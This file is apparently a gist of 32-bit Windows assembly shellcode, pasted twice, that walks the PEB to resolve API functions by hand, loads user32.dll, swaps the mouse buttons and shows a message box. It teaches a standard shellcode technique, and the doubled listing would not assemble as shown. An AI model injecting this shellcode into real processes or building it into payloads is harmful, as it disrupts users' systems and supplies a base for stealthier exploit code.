mmsamiei/shellcode_to_swap_mouse_button.cpp

## shellcode_to_swap_mouse_button.cpp
bits 32
	jmp start
start:
		push ebx
		mov ecx, 0x30
		mov eax, dword [fs: ecx];	EAX = Address Of PEB
		mov eax, [eax + 0xc];		EAX = Address Of PEB->Ldr
		mov esi, [eax + 0x14];		ESI = PEB->Ldr.InMemOrder
		lodsd;						EAX = Second module
		xchg eax, esi;				EAX = ESI, ESI = EAX
		lodsd;						EAX = Third(kernel32)
		mov ebx, [eax + 0x10];		EBX = Base address

	;// Find the export table of kernel32.dll

		mov edx, [ebx + 0x3c];		EDX = DOS->e_lfanew
		add edx, ebx;				EDX = PE Header
		mov edx, [edx + 0x78];		EDX = Offset export table
		add edx, ebx;				EDX = Export table
		mov esi, [edx + 0x20];		ESI = Offset names table
		add esi, ebx;				ESI = Names table
		xor ecx, ecx;				EXC = 0

	;// Find GetProcAddress function name

		Get_Function:
		inc ecx;								Increment the ordinal
		lodsd;									Get name offset, Note that the “lodsd” instruction will also increment the esi register value with 4!
		add eax, ebx;							Get function name
		cmp dword [eax], 0x50746547;			GetP, 50 74 65 47 ascii values meaning PteG
		jnz Get_Function
		cmp dword [eax + 0x4], 0x41636f72;	rocA
		jnz Get_Function
		cmp dword [eax + 0x8], 0x65726464;	ddre
		jnz Get_Function

	;// Find the address of GetProcAddress function

		mov esi, [edx + 0x24];					ESI = Offset ordinals
		add esi, ebx;							ESI = Ordinals table
		mov cx, [esi + ecx * 2];				CX = Number of function
		dec ecx
		mov esi, [edx + 0x1c];					ESI = Offset address table
		add esi, ebx;							ESI = Address table
		mov edx, [esi + ecx * 4];				EDX = Pointer(offset)
		add edx, ebx;							EDX = GetProcAddress

	;//Find the LoadLibrary function address

		xor ecx, ecx;				ECX = 0
		push ebx;					Kernel32 base address
		push edx;					GetProcAddress
		push ecx;					0, null end of string
		push 0x41797261;			aryA, it is for saving string
		push 0x7262694c;			Libr
		push 0x64616f4c;			Load
		push esp;					"LoadLibrary", it is input parameter
		push ebx;					Kernel32 base address
		call edx;					GetProcAddress(LL)

	;//Load user32.dll library

		add esp, 0xc;				pop "LoadLibraryA", or we could use pop and pop and pop!
		pop ecx;					ECX = 0, pop it because of 0 of end of string
		push eax;					EAX = LoadLibraryA, after calling a function, the return data will be saved in the eax register.
		push ecx
		mov cx, 0x6c6c;				ll, cx is half of the ecx so we can push 2 chars instead of 4.
		push ecx
		push 0x642e3233;			32.d
		push 0x72657375;			user
		push esp;					"user32.dll"
		call eax;					LoadLibrary("user32.dll")

	;//Get SwapMouseButton function address

		add esp, 0x10;					Clean stack
		mov edx, [esp + 0x4];			EDX = GetProcAddress
		push eax
		xor ecx, ecx;					ECX = 0
		push ecx
		mov ecx, 0x616E6F74;			tona
		push ecx
		sub dword [esp + 0x3], 0x61; Remove "a"
		push 0x74754265;				eBut
		push 0x73756F4D;				Mous
		push 0x70617753;				Swap
		push esp;						"SwapMouseButton"
		push eax;						user32.dll address
		call edx;						GetProc(SwapMouseButton)

	;//Call SwapMouseButton function

		add esp, 0x14;				Cleanup stack
		xor ecx, ecx;				ECX = 0
		; inc ecx;					true
		push ecx;					1
		call eax;					Swap!

	;//Get MessageBoxA  function address


		mov edx, [esp + 0x8];			EDX = GetProcAddr
		mov eax, [esp];					EAX = user32.dll address
		xor ecx, ecx
		push ecx
		mov ecx, 0x6141786f;			oxAa
		push ecx
		sub dword [esp + 0x3], 0x61; Remove "a"
		push 0x42656761;				ageB
		push 0x7373654d;				Mess
		push esp;						"MessageBoxA"
		push eax;
		call edx;						GetProc(MessageBoxA)

	;//Call the MessageBoxA function

		add esp, 0x10;			clean stack
		mov ecx, 0x6141786f;			oxAa
		push ecx
		sub dword [esp + 0x3], 0x61; Remove "a"
		push 0x42656761;				ageB
		push 0x7373654d;				Mess
		xor ecx, ecx;			ECX = 0
		push ecx;				uType = 0 = MB_OK
		xor ecx, ecx;			ECX = 0
		push ecx;				lpCaption = 0 = Error
		mov ecx, esp
		add ecx, 0x08
		push ecx;				"MessageBoxA"
		xor ecx, ecx
		push ecx;				hWnd = 0
		call eax;				MessageBoxA

	;// Clean Stack
		add esp, 0x1c
		pop ebx
	bits 32
	jmp start
	start:
	push ebx
	mov ecx, 0x30
	mov eax, dword [fs: ecx]; EAX = Address Of PEB
	mov eax, [eax + 0xc]; EAX = Address Of PEB->Ldr
	mov esi, [eax + 0x14]; ESI = PEB->Ldr.InMemOrder
	lodsd; EAX = Second module
	xchg eax, esi; EAX = ESI, ESI = EAX
	lodsd; EAX = Third(kernel32)
	mov ebx, [eax + 0x10]; EBX = Base address

	;// Find the export table of kernel32.dll

	mov edx, [ebx + 0x3c]; EDX = DOS->e_lfanew
	add edx, ebx; EDX = PE Header
	mov edx, [edx + 0x78]; EDX = Offset export table
	add edx, ebx; EDX = Export table
	mov esi, [edx + 0x20]; ESI = Offset names table
	add esi, ebx; ESI = Names table
	xor ecx, ecx; EXC = 0

	;// Find GetProcAddress function name

	Get_Function:
	inc ecx; Increment the ordinal
	lodsd; Get name offset, Note that the “lodsd” instruction will also increment the esi register value with 4!
	add eax, ebx; Get function name
	cmp dword [eax], 0x50746547; GetP, 50 74 65 47 ascii values meaning PteG
	jnz Get_Function
	cmp dword [eax + 0x4], 0x41636f72; rocA
	jnz Get_Function
	cmp dword [eax + 0x8], 0x65726464; ddre
	jnz Get_Function

	;// Find the address of GetProcAddress function

	mov esi, [edx + 0x24]; ESI = Offset ordinals
	add esi, ebx; ESI = Ordinals table
	mov cx, [esi + ecx * 2]; CX = Number of function
	dec ecx
	mov esi, [edx + 0x1c]; ESI = Offset address table
	add esi, ebx; ESI = Address table
	mov edx, [esi + ecx * 4]; EDX = Pointer(offset)
	add edx, ebx; EDX = GetProcAddress

	;//Find the LoadLibrary function address

	xor ecx, ecx; ECX = 0
	push ebx; Kernel32 base address
	push edx; GetProcAddress
	push ecx; 0, null end of string
	push 0x41797261; aryA, it is for saving string
	push 0x7262694c; Libr
	push 0x64616f4c; Load
	push esp; "LoadLibrary", it is input parameter
	push ebx; Kernel32 base address
	call edx; GetProcAddress(LL)

	;//Load user32.dll library

	add esp, 0xc; pop "LoadLibraryA", or we could use pop and pop and pop!
	pop ecx; ECX = 0, pop it because of 0 of end of string
	push eax; EAX = LoadLibraryA, after calling a function, the return data will be saved in the eax register.
	push ecx
	mov cx, 0x6c6c; ll, cx is half of the ecx so we can push 2 chars instead of 4.
	push ecx
	push 0x642e3233; 32.d
	push 0x72657375; user
	push esp; "user32.dll"
	call eax; LoadLibrary("user32.dll")

	;//Get SwapMouseButton function address

	add esp, 0x10; Clean stack
	mov edx, [esp + 0x4]; EDX = GetProcAddress
	push eax
	xor ecx, ecx; ECX = 0
	push ecx
	mov ecx, 0x616E6F74; tona
	push ecx
	sub dword [esp + 0x3], 0x61; Remove "a"
	push 0x74754265; eBut
	push 0x73756F4D; Mous
	push 0x70617753; Swap
	push esp; "SwapMouseButton"
	push eax; user32.dll address
	call edx; GetProc(SwapMouseButton)

	;//Call SwapMouseButton function

	add esp, 0x14; Cleanup stack
	xor ecx, ecx; ECX = 0
	; inc ecx; true
	push ecx; 1
	call eax; Swap!

	;//Get MessageBoxA function address


	mov edx, [esp + 0x8]; EDX = GetProcAddr
	mov eax, [esp]; EAX = user32.dll address
	xor ecx, ecx
	push ecx
	mov ecx, 0x6141786f; oxAa
	push ecx
	sub dword [esp + 0x3], 0x61; Remove "a"
	push 0x42656761; ageB
	push 0x7373654d; Mess
	push esp; "MessageBoxA"
	push eax;
	call edx; GetProc(MessageBoxA)

	;//Call the MessageBoxA function

	add esp, 0x10; clean stack
	mov ecx, 0x6141786f; oxAa
	push ecx
	sub dword [esp + 0x3], 0x61; Remove "a"
	push 0x42656761; ageB
	push 0x7373654d; Mess
	xor ecx, ecx; ECX = 0
	push ecx; uType = 0 = MB_OK
	xor ecx, ecx; ECX = 0
	push ecx; lpCaption = 0 = Error
	mov ecx, esp
	add ecx, 0x08
	push ecx; "MessageBoxA"
	xor ecx, ecx
	push ecx; hWnd = 0
	call eax; MessageBoxA

	;// Clean Stack
	add esp, 0x1c
	pop ebx